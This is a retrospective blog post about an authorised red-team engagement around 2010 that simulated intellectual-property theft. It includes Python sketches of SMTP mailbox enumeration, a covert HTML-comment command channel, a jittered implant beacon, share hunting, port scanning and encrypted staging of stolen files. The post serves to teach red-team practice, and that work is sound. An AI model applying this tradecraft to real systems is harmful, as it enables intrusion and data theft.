Today I stumbled upon a tweet from Dominic Chell about an article that he wrote. It gave me a feeling of nostalgia for the era in which ‘red team’ was not yet a familiar term for most clients, and it prompted me to write up the story of a red team that I participated in around ~2010. To ensure that some details remain hidden, I’ve mixed in a couple of techniques from other red teams that I participated in around the same period. Although I’d almost bet that the gaps in my memory are enough to obfuscate the most important details :P
You might be wondering: why write up something old and probably with zero relevance to the actual state of defense today? The reason is exactly that: to hopefully provide insight into how clients and technology have evolved, making it more difficult for adversaries not only to get in, but also to remain undetected. In addition, I hope that other people can learn from the mistakes we made back then.
If you suddenly find yourself wishing you had done red teams back then, don’t feel sad. There is a big probability that in another ~10 years you will look back and think: whoa, red teaming was pretty easy around ~2019.
If you enjoy stories from the past, keep on reading.
The assignment
The assignment came from a pretty cool client that was concerned about intellectual property being stolen by foreign actors. They had a couple of requirements:
- Actually steal the information
- If caught or detected, keep going
- Do the stuff the actor does
Not a lot of requirements, right? We didn’t complain ;) It was also one of those first moments where you have to look at an actual threat actor, instead of just being the ‘creative pentester’.
The first requirement was to ensure that the message about the state of their security was brought home when the results were presented. A more practical reason for it was that they wanted to know whether their own investigation would be able to identify which information had been stolen.
The second requirement was pretty awesome: it resulted in one of the first ‘battles’ and some elevated heartbeats while keeping our access to the network even after being detected. The only event that would end the red team was them being able to trace us back to the company we worked for. As long as the detections remained in the realm of ‘the attacker’, we could just carry on.
The third requirement was the one that taught us the most, since we learned that getting to your objective is not about using ‘the latest techniques’, but about using the techniques that work and fit the profile of the actor. It also taught us that the biggest difference between ‘pentest’ and ‘red team’ really is patience.
We decided to perform this red team operation with a two-person team, assisted by colleagues whenever we needed additional skills, knowledge & ideas.
Initial foothold
Our team lead gave us the assignment and the written proposal, and performed a kick-off with further details. After that we were on our own. So where to start?
Our first action was to order a separate internet connection, a regular home ISP contract. Since the privacy laws in our country are pretty strict, tracing that IP back to the company we worked for would, as far as we knew back then, only be possible for law enforcement. It might have been overkill, but we figured we would re-use it for future operations, and in those days renewing your IP could be done by rebooting the router/modem. We also only intended to use this connection for simple OSINT actions and to connect to other infrastructure.
We decided to first read up on the target organization, though not in a technical sense. We performed the following actions:
- Read their website
- Search around for current news articles
- Read published articles from them
This gave us an idea of the type of organization that we were going to attack, as well as which people were public facing. It also gave us an idea of the type of information they would consider ‘intellectual property’. The client had stated that they would not define that unless we asked for a so-called ‘leg up’. That is, if we were not able to identify it on our own, the client would provide us with specific filenames or keywords to enable us to hunt for it.
After this we started to think about the technical part. Our background was mainly pentesting (from web to internal networks and the software part of custom hardware systems). These are the options that we considered:
- Their external infrastructure
- Phishing
- Sending them hardware / dropping hardware
Since we had to do the stuff that the real actor did, we had to drop the hardware option. After all, we could not find a single public online source stating that they shipped hardware to their victims. We could, however, find that they poked external infrastructure and that their successful breaches all seemed to have phishing as the common attack vector.
We decided to do both at the same time. We got ourselves some cheap VPSes, some within our country and others in the presumed attacker’s country. We used those to scan and poke their external infrastructure. We also figured that if we triggered any detection, it would allow us to gather some additional information on them. We considered the rented VPSes to be throwaway infrastructure.
We then started to think about the phishing part; again we had a couple of options:
- Word macro
- Zip files with executables in them
- Java applets
We decided that the zip file option would be our last resort. You might be thinking: really? Well yes, we had actually used that one successfully before. Just a .pdf.exe or whatever with the appropriate icon in a zip file worked great back then. So we started to develop Word documents and Java applets. Since we had no clue about the target systems, we decided to do some light recon first:
- Metadata from their published files
- Technical information from their job descriptions
- Technical information from returned emails after we sent them some gibberish emails
- Technical information from some of their infrastructure with verbose errors enabled
- Technical information from some spammy URLs we put out via email to some of the public addresses
All of this gave us enough information to base our attacks on, as well as to work from some assumptions. After all, being detected as ‘an attacker’ didn’t mean the end of our operation. We also used Hotmail for most of the above spammy emails. That saved us the trouble of setting up our own mail server, and it fit the behaviour of some spammers perfectly.
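To give an idea of the metadata step from that recon list: a few lines of scripting against the documents on their website already leaked usernames and software versions. Below is a rough present-day sketch of the idea, assuming the exiftool CLI is available; our actual tooling back then was different and the filenames are made up.

```python
# Rough sketch of the "metadata from published files" step: pull author,
# creator tool and similar fields out of downloaded documents.
# Assumes the exiftool CLI is installed; the filenames are hypothetical.
import json
import subprocess

DOWNLOADED = ["whitepaper.pdf", "press_release.doc"]  # made-up files from their site

for path in DOWNLOADED:
    raw = subprocess.run(["exiftool", "-json", path],
                         capture_output=True, text=True, check=True).stdout
    meta = json.loads(raw)[0]
    # usernames, internal paths and software versions tend to hide in these fields
    for field in ("Author", "Creator", "Producer", "LastModifiedBy"):
        if field in meta:
            print(f"{path}: {field} = {meta[field]}")
```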
Most of the information that we collected concerned:
- Operating system
- Browser and plugins
- Employee email format, names, functions, phone numbers
- Information on out-of-office employees
- Limited information on possible AV
- Some information on their server park responsible for handling the sensitive information
By now we had most of our stuff going:
- Droppers in Java and Word
- Some targets
- No payload :(
So we improved the second bullet by just brute forcing email addresses against their mail server (the verification step is sketched below). This gave us over 500 targets, which we then simply spammed to retrieve additional information on their department and their function within the company. You’d think that would have gotten us our first detection, right? At the debrief they told us that to them it just looked like yet another spam run..lol. It got one of our VPS IP addresses blacklisted on their mail server; that was the only consequence we experienced.
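The brute force boiled down to abusing the fact that their mail server answered RCPT TO differently for existing and non-existing mailboxes. A minimal sketch of that idea, with made-up hostnames and addresses (our actual tooling was different):

```python
# Hypothetical sketch of the address-verification step, assuming the target's
# mail server rejects RCPT TO for unknown mailboxes. Hostnames and addresses
# below are made up for illustration.
import smtplib

CANDIDATES = ["j.doe@example.com", "jdoe@example.com", "john.doe@example.com"]
MX_HOST = "mx.example.com"            # taken from the target's MX records
MAIL_FROM = "newsletter@example.net"  # throwaway sender identity

def is_valid(address):
    """Return True if the mail server accepts RCPT TO for this address."""
    with smtplib.SMTP(MX_HOST, 25, timeout=30) as smtp:
        smtp.ehlo()
        smtp.mail(MAIL_FROM)
        code, _ = smtp.rcpt(address)
        return code == 250  # 250 = recipient accepted, 550 = unknown user

for candidate in CANDIDATES:
    if is_valid(candidate):
        print("valid:", candidate)
```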
For the payload we decided not to re-invent the wheel, but to modify an existing one. We chose ‘insider‘. This was a pretty basic implant, written in C, that retrieved commands from a backend. We performed the following modifications:
- Rewrote the backend in PHP
- Added database support
- Added encryption
- Improved proxy aware support
- Fixed multiple minor things
The reason we chose this implant was that it embedded the commands and responses inside an HTML page. We could just use a static page, or proxy a real page, and the evil payload would be inserted as a kind of base64-encoded comment inside the HTML. Back then we thought this was pretty nifty.
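To illustrate the idea (not the actual implant code, which was C with a PHP backend): tasking hidden as a base64 blob inside an HTML comment, so a casual look at the page or the traffic just shows a normal website. The marker string below is made up and the encryption layer is left out.

```python
# Minimal sketch of the channel idea: commands hidden as a base64 blob inside
# an HTML comment. Marker is a placeholder; the real scheme also encrypted the blob.
import base64
import re

MARKER = "page-cache"  # hypothetical, something innocuous-looking

def embed(html, command):
    """Server side: hide a command in an HTML comment."""
    blob = base64.b64encode(command.encode()).decode()
    return html.replace("</body>", f"<!-- {MARKER}:{blob} --></body>")

def extract(html):
    """Implant side: pull the command back out of the page."""
    match = re.search(rf"<!-- {MARKER}:([A-Za-z0-9+/=]+) -->", html)
    return base64.b64decode(match.group(1)).decode() if match else None

page = "<html><body><h1>Totally normal news site</h1></body></html>"
tasked = embed(page, "dir \\\\fileserver\\projects /s")
print(extract(tasked))  # -> dir \\fileserver\projects /s
```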
The main drawback was that it did not provide SOCKS or similar ‘pivoting’ support. Dumb us didn’t even think about implementing it?! We just adapted by rewriting tools and doing everything command based. Somehow we thought it would be stealthier that way, due to less network traffic…unsure if that was the right train of thought.
After this we used Gmail to send out a couple of phishing emails with everything set up, and we got our infections. The phishing emails mainly exploited the natural curiosity and fear that people have. We used fake news articles that you could only view after accepting the Java applet warning. If you accepted, you got infected and we immediately sent back information about running processes. If you didn’t accept, we collected as much information as possible within the restrictions of the Java sandbox.
The Word Macro? We never used that one :(
Network propagation
So we got a couple of infections. Our implant even had jitter/randomness; we were so afraid of triggering detection that we used insane timeouts. Just as an example…the random wait happened after every action, so:
- Retrieval of a command: random pick between 30-120 min
- Posting back of a result: random pick between 20-60 min
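In rough pseudo-Python the beacon loop looked something like the sketch below; the retrieve/run/post functions are placeholders for the HTML-comment channel, and the real implant was written in C.

```python
# Rough sketch of the beacon loop with the insane jitter described above.
# All three helpers are placeholders for the real C implant's logic.
import random
import time

def retrieve_command():
    return "whoami"                    # placeholder: would fetch tasking from the C2 page

def run(command):
    return f"output of {command}"      # placeholder: would execute and capture output

def post_result(result):
    print("posting:", result)          # placeholder: would post back via the C2 page

def jitter(minutes_low, minutes_high):
    """Sleep a random number of minutes within the given bounds."""
    time.sleep(random.uniform(minutes_low, minutes_high) * 60)

while True:
    jitter(30, 120)                    # wait 30-120 min before asking for work
    command = retrieve_command()
    result = run(command)
    jitter(20, 60)                     # wait another 20-60 min before replying
    post_result(result)
```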
This might make the database functionality we added easier to understand. It not only allowed us to manage the multiple infections, but also to prepare a whole set of commands to be batch processed. Yes, this made mistakes a painful waste of time. We avoided them by having a test setup on which we first tried out our stuff.
Now let’s get on with the juicy lateral movement, right? Not in the sense that we use the term nowadays. Since we had to get to the juicy data, we did really boring stuff:
- Recursive dir listing on mounted network shares
- Search through file names
- Phish users based on ownership of the files
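Back then this was little more than a recursive dir listing redirected to a file plus searching through the output. A rough equivalent of the idea in Python, with a made-up share path and keywords:

```python
# Sketch of the boring file hunting: walk a mounted network share and flag
# filenames that match keywords. Share path and keywords are hypothetical.
import os

SHARE = r"\\fileserver\projects"                     # hypothetical mounted share
KEYWORDS = ("prototype", "design", "confidential")   # hypothetical IP-related terms

for root, _dirs, files in os.walk(SHARE):
    for name in files:
        if any(keyword in name.lower() for keyword in KEYWORDS):
            # note the full path and the file owner for later targeting/phishing
            print(os.path.join(root, name))
```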
That boring approach eventually landed us on the right workstations, the ones that contained all the juicy stuff. We also did some more traditional lateral movement, but that was mainly for persistence and looked like this:
- Code a custom executable to spawn processes, port scan, inject DLL files and scrape some memory
- Find vulnerable servers & exploit them
- We deployed a customized version of meterpreter for this on specific machines, since we needed SOCKS capabilities
- Infect them with our implant
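Just to illustrate the port scan piece of that custom executable (the real tool was native code and the range below is made up), it was nothing more than a plain TCP connect scan:

```python
# Minimal TCP connect scan, shown only to illustrate the port-scan piece of the
# custom tooling. The target range and port list are hypothetical.
import socket

TARGETS = ["10.0.0.%d" % i for i in range(1, 11)]  # made-up internal range
PORTS = [135, 139, 445, 3389]                      # common Windows services

for host in TARGETS:
    for port in PORTS:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.5)
        try:
            if sock.connect_ex((host, port)) == 0:
                print(f"{host}:{port} open")
        finally:
            sock.close()
```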
Now that I’m writing this, I wonder how the above ever worked. Yet it worked great! Oh and yes, you noticed correctly: we didn’t become domain admin, it wasn’t necessary.
Action on Objectives
So by now we had access to the employees who worked with the sensitive information on a daily basis, and we had multiple servers and workstations with persistence on them. Not all of them, though. Why not? Because we had seen in some of their documents that their standard procedure was to reboot machines in case of a potential infection. So we figured that on the machines where we performed the loudest actions, we would not install persistence. That way, if the user reported something, there would be no weird network or startup behaviour after the reboot. Yes, our files would still be on disk, but we crossed our fingers that our hidden location would remain hidden.
We had read that the real actor would exfiltrate the data by zipping it up, so we did the same-ish thing. The real actor collected the information in a single place, zipped it and then exfiltrated it. We also decided to collect in a single place (one of our infections had all the privileges we needed for the network shares). But instead of zip and exfiltrate, we decided to zip, gpg and exfiltrate. Why? Because we didn’t trust our dev skills, or ourselves, to implement encryption in a sane manner in our implant. Since, after all, we were a red team and not the real actor, we didn’t want to endanger the client’s information. So you might be sensing where this is going….we uploaded GPG Windows binaries to a single workstation and used those with a public key to protect the data before exfiltrating it.
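The staging step itself was nothing fancy: zip the collected files and encrypt the archive to our public key with the uploaded GPG binaries. A sketch of the idea, with made-up paths and key id (in the actual op this was done by hand with the gpg command line):

```python
# Sketch of the staging step: zip the collected files and encrypt the archive
# with a public key before exfiltration. Paths and key id are hypothetical;
# assumes the recipient public key was already imported with `gpg --import`.
import os
import subprocess
import zipfile

STAGING_DIR = r"C:\staging\loot"      # hypothetical collection point
ARCHIVE = r"C:\staging\collected.zip"
PUBKEY_ID = "redteam-exfil"           # hypothetical recipient key id

# 1. Zip everything that was collected on the staging workstation.
with zipfile.ZipFile(ARCHIVE, "w", zipfile.ZIP_DEFLATED) as archive:
    for root, _dirs, files in os.walk(STAGING_DIR):
        for name in files:
            full = os.path.join(root, name)
            archive.write(full, os.path.relpath(full, STAGING_DIR))

# 2. Encrypt the archive to our public key, so only we can open it afterwards.
subprocess.run(
    ["gpg", "--batch", "--trust-model", "always",
     "--output", ARCHIVE + ".gpg",
     "--encrypt", "--recipient", PUBKEY_ID, ARCHIVE],
    check=True,
)
```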
If you are wondering why we did trust the encryption to be good enough for everything else we did with the C2…well, we didn’t. We discussed this with the client, performed a worst-case analysis, and the client accepted the risk.
Closing thoughts
After performing the above red team and having a debrief with the customer, here are some of the lessons learned:
Client perspective
- The threat was taken seriously
- Stuff they thought impossible was proven
- Detection on specific choke points was improved
- Capability on being able to identify the impact of an attacker was improved (knowing what the attacker stole / did)
The remark I remember the most was something along the lines of ‘stealing the information is what convinced upper management’. Again, technical privileges and awesomeness mean nothing if you are not able to prove business impact. On our side we had like a zillion improvements to make, so we just created a list, prioritised it and started implementing the improvements.
A lot has changed since then, but in my personal opinion the need for companies to practice and learn will always remain. I hope you enjoyed reading this tale of a red team that happened ~10 years ago.